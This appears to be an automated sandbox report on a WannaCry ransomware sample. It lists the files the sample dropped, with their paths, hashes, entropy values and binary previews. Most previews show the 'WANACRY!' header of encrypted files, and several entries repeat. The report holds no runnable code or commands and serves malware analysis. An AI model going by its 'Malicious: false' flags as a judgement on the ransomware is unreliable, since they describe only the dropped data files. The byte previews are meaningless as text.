                                                                                      Preview:WANACRY!....X....Ay1..]....8+. ..R.CY....6.*QlN.m.U=.iMt.8.7.*..L...o..}........9......7<.#...."q.46.'...a..".Hohf.Q.nS.QC.FX"pb8s"a...$.0...4.....x....lOV..ga.Z.*.L.'.]..19O%d..U..O...w.I.......L.K..x5..,.@O.V.S.....0..w..q}..K)..A........._......sObtG.0...............A..0.eF.....J..#....W.k..18.7..p...G.u..Y..M..)...^.kj.zM3R/.......i.I....:.c)....}.."<7%.......VF<...,|.oOe..v._E.).4.-.....A.... d1Ypeb.r."......<.:..9#..Y....(.........a..#....O..UF=H.J.}..l7. .:....\^.0P...x.c... R5.......3..XQ.2..oRp'.$E.HkQx..Z........7e....L.er;5....P7.KU...2.`..!.l.'..T.s...Y\p*4..c:@'ZS._\.*L.Qc.r{....BM!.9.1.:..`#n:.'. J%J....D[De...=..}p....E...*2t...?s..B.x.......X.h...Sd..X.B}\.x..... ..4@.2.......M.AeC....a.1.......r7o...|Z.X..c.........*....jB.V......'z...h.].|....dx.A.ua..3A(....=...g.a.....>8...0.m..3Z.(#(...bKm+...Z....D...?;....s.....],^x.P.......d...T....(...y..i.W......H....]....,...|~$.\..=_`12sg..;.2.}\..js......X.. ..........4..60c'/
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.814491710523414
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:dezy/nMMHhGF/XmOpZI+blWJj4xyidEUOuF:TMMHhGJXmUI+bu2dEUx
                                                                                      MD5:38D173420C8FD7560EA497A2C55F0BBC
                                                                                      SHA1:1784B83FE2B864CB189BABD3DBC24B43F327E95E
                                                                                      SHA-256:F8142C2FD3B2D905FAE14EFE99BAACAB34E6781746074A412B6BC96A4D97E255
                                                                                      SHA-512:E67573384FDF44A6B74F9167FC3DCBC2E6606B200707B69BAFB19711FFAA8FA05F7E0EDB27DF2CA81F329C10058EAD892A70C036259C6ACCE082A20313E4CF8E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:%Tb8.._.W...K.6\sH...$z.ScHt.J!Z2G8..|}.lh*H..r...)5.<.^G.(..^...Sh..[2.'s..7.9S..._....x.9.pYhAEq..Rx...<.U(.c....NX...^h.....-....uT.W.....x..]..v....2L...U..........y.o....e<.....f8.D@....>..V.z=.h.B..Gz.m.....$.R.}..D.z...K..6.Y(O..{..6...|4T%..N.5.q......3d.|.L.(.@.O.k.....'...>...4.7..Z...X.$..!_'U....)c.c..........G..#u.....I...:........x.Np......2~.O{76LZ..r.nK.)i...=.A.1.p.<...-..uBL..cB..........6..|..x...F....<.)X...?h..$...4wf.,...v.U.#.1.9...K.6...i..k]p....O(.ce<.N.`<.ch...]/A.6..d.w..&\. 8...>.... *...... ...2\@..?.*..j.Ey.R.w&b...@..V.5....2..O{....U...q..o..P_.O%......G.rD..hvL.].....xi... ..{........7D..O.tTl}/......j&.Y\.#)2`kD.'...T.U..5|a.0.!Y...J].].K.....b.........=&..6.E.....SMw.!&.K......U Z..jJ..5._*ks$..-..c...}(.h#Hx;.mAc.|t..<.j.5...ztt.(.].3.!.46..]...|..:..F..Hai/n\%.5..q.!....D?N"k.(...m.w%...]i|.x..)S.f....P....7n.%.OV..9..k;..~.$.y................j2..T\l....d.c#.NM8q....?....zx..'..:..\...9....+..r.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.827615098450578
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk8BG6jGt7iU71D+5s24EawKzHdF26q4VQ0J/u8DYidTcska7:bkz6aD7V+iuawKzddVP/u+vya7
                                                                                      MD5:63DBF628AD289816ECD0B1CB969CBCF6
                                                                                      SHA1:58497CC7ECCBC94CD7264A3B6D71199272980430
                                                                                      SHA-256:EB45A6DA9B10DD97E2A07B09D94A436161FC9A676578DAAC71BDA1762C70A5EB
                                                                                      SHA-512:9387250F281BDFC84140BC1F71948BAA513EC2BA87922DC74808F12AB2F08C3BB2606998309CF34C92740C4CEB7A37452855E9E03F98B22BCE2B166AE700BEF5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......L.o...I......*..5\.AXe...U...z#.......aJ...).....S..{(...q.J.>....../&...)..........@S....oB....{....gT..........}.yR......;.~..Y.vh8.%..S..K.)..Q.......-.......6..vzJ..e.....l.>.A.#\.Q.`.B.r..j..~.+.f.M.....c.}...:n...I..|j..y.|....~w...............2-EVI.)....._=.:...,S...wn..0.K..$..`(...;.L&P....a..X.-.w')......C..@.="..7....G..\$.Q.y3...^....)..N['.rh..B{....Y_..`..M.v4-..z.H...%P.pIz.w}...0...(....~&..A4...:v.........7.......Q.?.*6O*O@...A........+..S.....t..7.....0s..y...t5.|..S}..V~;.8.u.k0.O..*.).g.<+....}...*!.I......1G~.%r.|..V.......f;._..+7.]..J......6.:...y.w+....f.GU.(.../Z.Y..\...ln........?.xu^.$=+......2.-..<`..Cq<eF......(uyz..U@.+.........;U*........t..%,?....8...}!...Y..X "...f.u .ag... ....{.......^W4H.c.D..R.,...1..{..C.....C34...[..].mn..vGZ&.30..a...}0...s.x.....I....`P.....2s..g.....l.'}jc.c.|>.Uj.7.#...7..n.q......N:I..F.T=......*...5h.B]..){......=;.Q..f.;......Z..z2Y....8....&..@..S.'.p.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.827615098450578
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk8BG6jGt7iU71D+5s24EawKzHdF26q4VQ0J/u8DYidTcska7:bkz6aD7V+iuawKzddVP/u+vya7
                                                                                      MD5:63DBF628AD289816ECD0B1CB969CBCF6
                                                                                      SHA1:58497CC7ECCBC94CD7264A3B6D71199272980430
                                                                                      SHA-256:EB45A6DA9B10DD97E2A07B09D94A436161FC9A676578DAAC71BDA1762C70A5EB
                                                                                      SHA-512:9387250F281BDFC84140BC1F71948BAA513EC2BA87922DC74808F12AB2F08C3BB2606998309CF34C92740C4CEB7A37452855E9E03F98B22BCE2B166AE700BEF5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......L.o...I......*..5\.AXe...U...z#.......aJ...).....S..{(...q.J.>....../&...)..........@S....oB....{....gT..........}.yR......;.~..Y.vh8.%..S..K.)..Q.......-.......6..vzJ..e.....l.>.A.#\.Q.`.B.r..j..~.+.f.M.....c.}...:n...I..|j..y.|....~w...............2-EVI.)....._=.:...,S...wn..0.K..$..`(...;.L&P....a..X.-.w')......C..@.="..7....G..\$.Q.y3...^....)..N['.rh..B{....Y_..`..M.v4-..z.H...%P.pIz.w}...0...(....~&..A4...:v.........7.......Q.?.*6O*O@...A........+..S.....t..7.....0s..y...t5.|..S}..V~;.8.u.k0.O..*.).g.<+....}...*!.I......1G~.%r.|..V.......f;._..+7.]..J......6.:...y.w+....f.GU.(.../Z.Y..\...ln........?.xu^.$=+......2.-..<`..Cq<eF......(uyz..U@.+.........;U*........t..%,?....8...}!...Y..X "...f.u .ag... ....{.......^W4H.c.D..R.,...1..{..C.....C34...[..].mn..vGZ&.30..a...}0...s.x.....I....`P.....2s..g.....l.'}jc.c.|>.Uj.7.#...7..n.q......N:I..F.T=......*...5h.B]..){......=;.Q..f.;......Z..z2Y....8....&..@..S.'.p.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.814382557676719
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:pZMe3PEMfhT9ZameOeQYfqcI4avOXzAxv6K4YXFl9MWXfV:XMMPxZZ9ePfqFvXd6PYXf9MWPV
                                                                                      MD5:AFC7EBD0933FFB6FEB34E569E699B853
                                                                                      SHA1:8FD4CA4CAF6F0F7DD7344A1C188CF6A7B6AFB1D6
                                                                                      SHA-256:415AD2BA2BA299BE13836FB56D6B04FF5869497C4F40F85E66E1BA5ADED8E748
                                                                                      SHA-512:F88576450911AC47483C15A093A84A6D9446AA43ADF079DD7F99BA0B43208A4A328CEC29B27EB974A480534A01DF820B86F35EA132A1A6336824039253199D1C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:......|H.v..t..a.5t..LB.v.s.J.FcB.h.t.v..H.o.a....>.*Y.)....".i@.PK.M.."......5.C.&3.w.Q..4.Q...$.}.B>,.......61....}5...w.r7..G...V*h.>1........?.B..h..0......w.^...K....2..H....U.?...g....$B...Ph...~9.A..~V;...I..MTy....Z...hJ..x.Z..Q4.... .........Q.oW.8.y..0.vdeY.=.#...?v..Jei..,...R......_....H^r'..:...|...N.....8-v...8......`...."KvLB..Y...4.|.(...sQ..-..!.e.4..Cl.p-;Q_++...p.WQ{{L.d.g../$w.b. ....p."n.\Oc..nY.....W.G..<i"...S.F....M.Y.#3Gi..@...+...x./s.Gd.<.P....L.Nm....q...h,.Gb....t<./)|.>..A{f....P.ty.a....9..7)..... y{...Y.4G<Qi.....6\U.tS......1%..8.l..\j.E..p.%...../.-.g*.P.M........J.4.yE.......in...pI.K.U.!4..?^<..X9..UU.&.S$`.n<.L.Y|....~.4a..gf.....W...l(..gf..u.l%.........I...G.\.9...2..BZ.'....6....3.......q.g../G.......Np.{..dBW}m.x(GH`N..D..1.'...L.#}.h.8?..+`...F.H#IZ.>..M.......`~."..........=...b.d|...|.. |.6....h9&...Z..k:......N.......b'..'m"@2o.dR...[x..E.Q./.x=...w........x]W~1..l.W$....#^......7 2.M...P5VFh!P.0
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.829895033130898
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkoj0FELt9GjjCGDf8G8czgnhSHNl+3dFDVMzRlHJAnd+1/IwJxO:bkojaELt9G6G8c8hSl+JQl+d/yO
                                                                                      MD5:A411A7719F9C7701F6F22C4CFC94703E
                                                                                      SHA1:3CB41EBB62686D5377FAB1C7044448A55E5B1F9E
                                                                                      SHA-256:4C0A12B47E09409E90AF4E2A37970336D66772F87393441301B0C5DF6F3B2CB6
                                                                                      SHA-512:D700CF1AA2E2169F353D9D83D62691651C07923C9A8D4BE70BE5D7E52864222CF52FAEECF5C988089A2FAD225EB38DDA514B85BA26E560D567F0D63B8D1DE86D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......Ij..@.h.....{(..:{a....F..4...1.....m..t.X........i.[.;RE..8.....e/...=.y2GM..XH.*..[.....[.u..WA..d..*.3.w..........XO*.K..fngP.HmU.|..b...oh..t....|......[...*.]s9....8.p..L....,..+...6.^\.......1.tU..~........&..R.wR...m.+..@8.`.................2."....u..F.Ogv,.=.a.y.M.^....\.N9.f......|}..-.Iw.'."...]....s....s.@....s....r........[kf.........\....O.v:M.t.u......U8m.".....X..D...J..=..U.#?oR/].n._.A..rj ..m..3...@..n.....*.ZWq+/.N...2....-L.<.0$..M.Q..~h2.fM.}....]......q..D.m.$od.5..;. ..3..zH..2nR..BU.?[cV..>..\1@......U.g2....o.{..0..D..6A.z..u.V...|. ........U..x1u.Hd...&I._.9.r.*...5X*|.r..H>..{....[y../-..Nt.A...A.[1.Gv...{.`.....]l.i...KCT.1.b........c....}&..K.e..C%.H...b..m.........&.._Ei<.=.*t..&....}..v&.D......K.cN...r.nR.....Nv|Im.....p....%..+?.;...F.0...#q../.:.....6H.dd.Jp.1....1.3..q..aj../.5.O.wW..T.../..z5.G%!n,.p#F..Y.F.:h.A.Eo...D..O.pt....ws......k..U..Z.PE9..0.A....^.X....."-..`..q..N..<...*.H
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.829895033130898
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkoj0FELt9GjjCGDf8G8czgnhSHNl+3dFDVMzRlHJAnd+1/IwJxO:bkojaELt9G6G8c8hSl+JQl+d/yO
                                                                                      MD5:A411A7719F9C7701F6F22C4CFC94703E
                                                                                      SHA1:3CB41EBB62686D5377FAB1C7044448A55E5B1F9E
                                                                                      SHA-256:4C0A12B47E09409E90AF4E2A37970336D66772F87393441301B0C5DF6F3B2CB6
                                                                                      SHA-512:D700CF1AA2E2169F353D9D83D62691651C07923C9A8D4BE70BE5D7E52864222CF52FAEECF5C988089A2FAD225EB38DDA514B85BA26E560D567F0D63B8D1DE86D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......Ij..@.h.....{(..:{a....F..4...1.....m..t.X........i.[.;RE..8.....e/...=.y2GM..XH.*..[.....[.u..WA..d..*.3.w..........XO*.K..fngP.HmU.|..b...oh..t....|......[...*.]s9....8.p..L....,..+...6.^\.......1.tU..~........&..R.wR...m.+..@8.`.................2."....u..F.Ogv,.=.a.y.M.^....\.N9.f......|}..-.Iw.'."...]....s....s.@....s....r........[kf.........\....O.v:M.t.u......U8m.".....X..D...J..=..U.#?oR/].n._.A..rj ..m..3...@..n.....*.ZWq+/.N...2....-L.<.0$..M.Q..~h2.fM.}....]......q..D.m.$od.5..;. ..3..zH..2nR..BU.?[cV..>..\1@......U.g2....o.{..0..D..6A.z..u.V...|. ........U..x1u.Hd...&I._.9.r.*...5X*|.r..H>..{....[y../-..Nt.A...A.[1.Gv...{.`.....]l.i...KCT.1.b........c....}&..K.e..C%.H...b..m.........&.._Ei<.=.*t..&....}..v&.D......K.cN...r.nR.....Nv|Im.....p....%..+?.;...F.0...#q../.:.....6H.dd.Jp.1....1.3..q..aj../.5.O.wW..T.../..z5.G%!n,.p#F..Y.F.:h.A.Eo...D..O.pt....ws......k..U..Z.PE9..0.A....^.X....."-..`..q..N..<...*.H
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.825031617480904
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:s97DnSG2oEXy5CITiiV46q1b+q/wD0V5vx4GZyp1L7Uafko5xzR:s9vnSdKCIWiVtqRoYnx4v1vUaso5hR
                                                                                      MD5:40026D0E4FF1153A54CFA3E86E4247F6
                                                                                      SHA1:A2CBFF249373514FA73049143D50EF4116606E62
                                                                                      SHA-256:CFA1A0E09016D41C48D221F04E1028E3C704D5284028BF9FC2BEE08D91407B68
                                                                                      SHA-512:585915EE171144FA5EF9C0CBCE8CF5456221DE86031A85BEAEA761E3C1AAD088567F13EB6569F069AA5DDB52F6EF7C2A2893B26973A6F45DB39441C1786644E8
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:e_@..n.......".H.Z...%..w..z...<W......{...c...m.D....,;..9..8.#z....(.D.. ....e...-m....R.l>......*........k@O}n@u..@....V..u.......!.r{TB{.u...-..E.VW.o+...?..\..lL.'o...#./_.....m;x.!zW{2.C~.\mA....C%..._+..-..........b7F(/...haE=.3{.<.`.....D.....M#.....;...XIt.#..5..*,..e5..;d.......j.N....C.../.{S..0..5*.Ln.<....o..(.<.o..._..6.B..P.X..0L.....%.85.Q<.#W.t.......&.w0...Z.\.t....8..UA........HW.<.h...rf.s<.iH'.@W&...0.o...M\..D>[..jU.$....#..&.b..u=...'...e:2..j..O..D..D..J...H..........-xm.:iy3nr.Dh.;....;r..&....)../s#....T..s+.-..G..(\.g..?O...E.U.s....d)u...\v.^{].a..Y.....i...A.".c\F.=.3....#...)S(..0n1...\.m..o.....f.r`.u...uAy....q]......>..?....Z..,.N%.:.Ox.3M..m...QVq..M0.....Z9...b......?B<.......!d..C..Y[...~KD. ..0...l9..k.$Z.G`7Z..c.:..o..v4)6,.L..~...[..._+..8.x&..\0.uf..",.,%..~.D.T..C.n.:;`..._.n..o..hR..f..F~..?.Td....:..........m..<YJ.I.^..IsOa...j..Cj..g....T~....x.>...<.T....K.k6df1-.$..+.....Ra.73.i..7.3lG..1....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.829771732005548
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkG+yOFWUw+HRZ3/hAaDIdE7GTU03wgb1UQyVmifc2ixLO+ZjwL6l:bkGPww+PpAGIdE75iw+HQixLGLu
                                                                                      MD5:1E3A570350B9520B1CD77E134AF08EBD
                                                                                      SHA1:22E13FCEA754CF59E02DB13511BCFAE8467E2D8C
                                                                                      SHA-256:5D4D809F5A98BDCE6DD15251C86D4B96276811389D2C9EEEB6E75E3786092591
                                                                                      SHA-512:4C76F0B616311D8F6D28E9077C204FDF3F4C742E9C4E6FA61CE32DF767C306C7F24EF3EDBF26D8C03C3A920D81018850E5DAC15F21320CB3CF9B7A56F99A3941
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....dd. ..a........'5$.y....E./n....._....H.`.T.!.-........~..../..<.I@U...t!t.N...V.5)}w..4..@0.'R.d...W..V.........XN1.`1.@P>.2%...<}.,.)b.(.,.V.d...A.6R.=.~.2.../.R......TT.w.z6e.%z.p..HN0CO.#.c..D...S.i..7"!`9.N.sr6.}P..ul.L).i.%..+.1....S..............0........,l..a>..R.P...U..r...|#...5.kW......;...[V`....U..D9W.oB.(...1...<..m.hV...!.(.Y.i..p...2...(...D...b...m..bP......._..i...5.Y..h..a.Q.m>E.l..A=G..R.M*..^u..D.Z...%..)+.}.....|.`.~..............L......_.....Y.6..H. ..p?6..C..H...<...z.......c...UgL!..#p', R4..?...l.)..s|._v.y.K......J...f.....@..'.(..|..k.8..B\..u.Z.D.%)4T..,l.4.....2O...P.6....+.qR.^...Z;..6).:..{..E..&...^...}x, .....M7..2w..z $,.q......Bj...P.411..U.?.ti....9.k}.....}.[%.UJ...!P.r.g...1...s.C.b.9F.}..y..'..YR!z...!...3...b...m.3.S..Sy..W.......7..dX...ob).n..c....._......Ug#.6..[....k='.Y`....{.Z.{.{..a..i...tE.K;y..O..pK.9.m.@..]..h.....i..GMn{...p.H.gb.......,.~..;............NjeJ.cb.W-....J.im...`T
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.829771732005548
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkG+yOFWUw+HRZ3/hAaDIdE7GTU03wgb1UQyVmifc2ixLO+ZjwL6l:bkGPww+PpAGIdE75iw+HQixLGLu
                                                                                      MD5:1E3A570350B9520B1CD77E134AF08EBD
                                                                                      SHA1:22E13FCEA754CF59E02DB13511BCFAE8467E2D8C
                                                                                      SHA-256:5D4D809F5A98BDCE6DD15251C86D4B96276811389D2C9EEEB6E75E3786092591
                                                                                      SHA-512:4C76F0B616311D8F6D28E9077C204FDF3F4C742E9C4E6FA61CE32DF767C306C7F24EF3EDBF26D8C03C3A920D81018850E5DAC15F21320CB3CF9B7A56F99A3941
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....dd. ..a........'5$.y....E./n....._....H.`.T.!.-........~..../..<.I@U...t!t.N...V.5)}w..4..@0.'R.d...W..V.........XN1.`1.@P>.2%...<}.,.)b.(.,.V.d...A.6R.=.~.2.../.R......TT.w.z6e.%z.p..HN0CO.#.c..D...S.i..7"!`9.N.sr6.}P..ul.L).i.%..+.1....S..............0........,l..a>..R.P...U..r...|#...5.kW......;...[V`....U..D9W.oB.(...1...<..m.hV...!.(.Y.i..p...2...(...D...b...m..bP......._..i...5.Y..h..a.Q.m>E.l..A=G..R.M*..^u..D.Z...%..)+.}.....|.`.~..............L......_.....Y.6..H. ..p?6..C..H...<...z.......c...UgL!..#p', R4..?...l.)..s|._v.y.K......J...f.....@..'.(..|..k.8..B\..u.Z.D.%)4T..,l.4.....2O...P.6....+.qR.^...Z;..6).:..{..E..&...^...}x, .....M7..2w..z $,.q......Bj...P.411..U.?.ti....9.k}.....}.[%.UJ...!P.r.g...1...s.C.b.9F.}..y..'..YR!z...!...3...b...m.3.S..Sy..W.......7..dX...ob).n..c....._......Ug#.6..[....k='.Y`....{.Z.{.{..a..i...tE.K;y..O..pK.9.m.@..]..h.....i..GMn{...p.H.gb.......,.~..;............NjeJ.cb.W-....J.im...`T
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.817650891199994
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:cvAu6Nw/nJ4aSchXfOAyiXwlt0auYu3+TTuJFbmNY:pSnJ4f4hy0wL0au+3Q
                                                                                      MD5:F148C071F58E6C6FC2920AB2B74A1A2D
                                                                                      SHA1:C2BEDE846F5B6B9D53E535FBC8402DA766C0748F
                                                                                      SHA-256:B8449A29B7EB8BB96D92ED1E209418FF36CC7A1A5F03D392E7A0F375912C1508
                                                                                      SHA-512:A17CC479BF3F2359F17EBA846366A741EEC3176A7928D36D8697CEF7253A358D1705A7540628172C7FCF56C113FB41468D3A27EF535B4D95706C5F0CE712E3A5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..[..>.T.D;.[....1:[.B9bk.D......-.....+.iqIt.....\.V..',fo96....!.sC...-...3.P....uF....Q.._..T...8.i.RAI...7..rM.O.E...%.....i4.t&...9s........6^..[[.G.h].\+nr..J"<y..d.5o... .U<8.E...;.f...?(.y...m...H$..s..2I..o~....`...p...@.2..:.....y....F.=.P....(.):..9......hq}.x./P........l....L.Q.b.[K...R.&..c;8d}h.r...9a G{....w.L,...E.3...d.n@.+..%...u&...5...0...>S.j..V}n.\.[.........t.w.g.51-m.d-....Z..K....ah...E..}:[.J>M...c.Sy...<.Ag......7....H...>...k. ..h.q.e.Uc.wZ.<..y.....g...O.W4....F.......WD...Jt&..'.;...~...(.JZUyd.R.2.iK..OO..T :.u\4.s.C..p.......(=.B/j|.$e.G.A.=.".....t..V:..Y...{...F%sh....dG.F...n"]S...z...'..DD....c....#..%......0.S...Z.3F......ZlCb)...v.|C>^-...E.E./@.-8.....&x....$......aTW..)k.......A.U.JPW6YR.Bq...Z.:{+g'........[!y.E..g$MM....k..{.T.t.^..t...H....m{.5.......9...TQ8....mq.</.o.V...|..G.,.........=..+8.M.@}8O........B..u.R..{7.......Ls...........}@5......H.v.d...S.[<.Pn*....".v..\hU.W;.e=..m..h+c.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.845572153474442
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkCUdTt4cCGmKA2DmORG8ipWrPxR+DAvEFEvfV0L7Idu7:bkBTtfFXyORx61mXWL7mu7
                                                                                      MD5:D48D48D820EBF8862B8C1C1D4A114F23
                                                                                      SHA1:4C9C9DF474932B047036FDF0B82D7DC5C495E409
                                                                                      SHA-256:EA19CD858C007BB4FB40605D780060B5987BAEFE3FA34D832832F50B8F497D08
                                                                                      SHA-512:910E5D2BB3B52A6FEA65499F4A3CCA6E79BF7878C29F3596F549BA2FBE5A59E6A0E06D819F76632E7C8D6F967FDD56A6B46A3B5A3BFDBE8B0165DECFDD47770D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....@Y..qZ.*....J.6T..4....[..M{@.z?..NV....L.$.....+..^...8...9.....'.C....y^5..Y.[....f.V.......T..n..^.~...{.v.0...3d.>M.$.j.!>...S.B.2.`+.,.....*.H...........K..j...EH...F...W.d.5D.u=..[j.......F<.o. ....DUn~......k....E...[..*.rC...LR............-...^.C...n.y......Y...C:RDR.-.....^v#e.#.G.rO...F.g. j.........5Am+..p..,hr..L..,.N<}...=.=.p.S.........Z..l.....Sz..F...6....9q2..Q...s,...........+quY...+.`.W.59...W).s.2...8..&.IKu..h 5.P.}.d...S.F..N<b..`.....QW.I..D..`.TA......l*Y.\Z |E..Z...K..j+?=.[.@gT|..C.....J....&&.[l.XCMw..(;.N......Bj8..d...GZ2....)..BF.........vw..*{...$}t.....X.W..].@#G...O..#/..-.....k....k..(.!.>k....4W.........d.Q<5...I0...S..5.I....k.m..v.;a.bc.&...\..wG.x.[F.?.w.b.L.R.m......Y.-.3.....a..f.=...W}....g.W........g&.......eG....<=.o!.x......b......}..>.w......>ghY.....T])...H50....\.....0.Z.f.i[..q..k...&PF.....|=....9#q.......I.F.......ZNm...j3...h\.|.....2)u.H.Z......z.)...=T..J7..+
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.845572153474442
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkCUdTt4cCGmKA2DmORG8ipWrPxR+DAvEFEvfV0L7Idu7:bkBTtfFXyORx61mXWL7mu7
                                                                                      MD5:D48D48D820EBF8862B8C1C1D4A114F23
                                                                                      SHA1:4C9C9DF474932B047036FDF0B82D7DC5C495E409
                                                                                      SHA-256:EA19CD858C007BB4FB40605D780060B5987BAEFE3FA34D832832F50B8F497D08
                                                                                      SHA-512:910E5D2BB3B52A6FEA65499F4A3CCA6E79BF7878C29F3596F549BA2FBE5A59E6A0E06D819F76632E7C8D6F967FDD56A6B46A3B5A3BFDBE8B0165DECFDD47770D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....@Y..qZ.*....J.6T..4....[..M{@.z?..NV....L.$.....+..^...8...9.....'.C....y^5..Y.[....f.V.......T..n..^.~...{.v.0...3d.>M.$.j.!>...S.B.2.`+.,.....*.H...........K..j...EH...F...W.d.5D.u=..[j.......F<.o. ....DUn~......k....E...[..*.rC...LR............-...^.C...n.y......Y...C:RDR.-.....^v#e.#.G.rO...F.g. j.........5Am+..p..,hr..L..,.N<}...=.=.p.S.........Z..l.....Sz..F...6....9q2..Q...s,...........+quY...+.`.W.59...W).s.2...8..&.IKu..h 5.P.}.d...S.F..N<b..`.....QW.I..D..`.TA......l*Y.\Z |E..Z...K..j+?=.[.@gT|..C.....J....&&.[l.XCMw..(;.N......Bj8..d...GZ2....)..BF.........vw..*{...$}t.....X.W..].@#G...O..#/..-.....k....k..(.!.>k....4W.........d.Q<5...I0...S..5.I....k.m..v.;a.bc.&...\..wG.x.[F.?.w.b.L.R.m......Y.-.3.....a..f.=...W}....g.W........g&.......eG....<=.o!.x......b......}..>.w......>ghY.....T])...H50....\.....0.Z.f.i[..q..k...&PF.....|=....9#q.......I.F.......ZNm...j3...h\.|.....2)u.H.Z......z.)...=T..J7..+
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):933
                                                                                      Entropy (8bit):4.711824502619554
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                                                      MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                                                      SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                                                      SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                                                      SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                                                      Malicious:false
                                                                                      Reputation:low
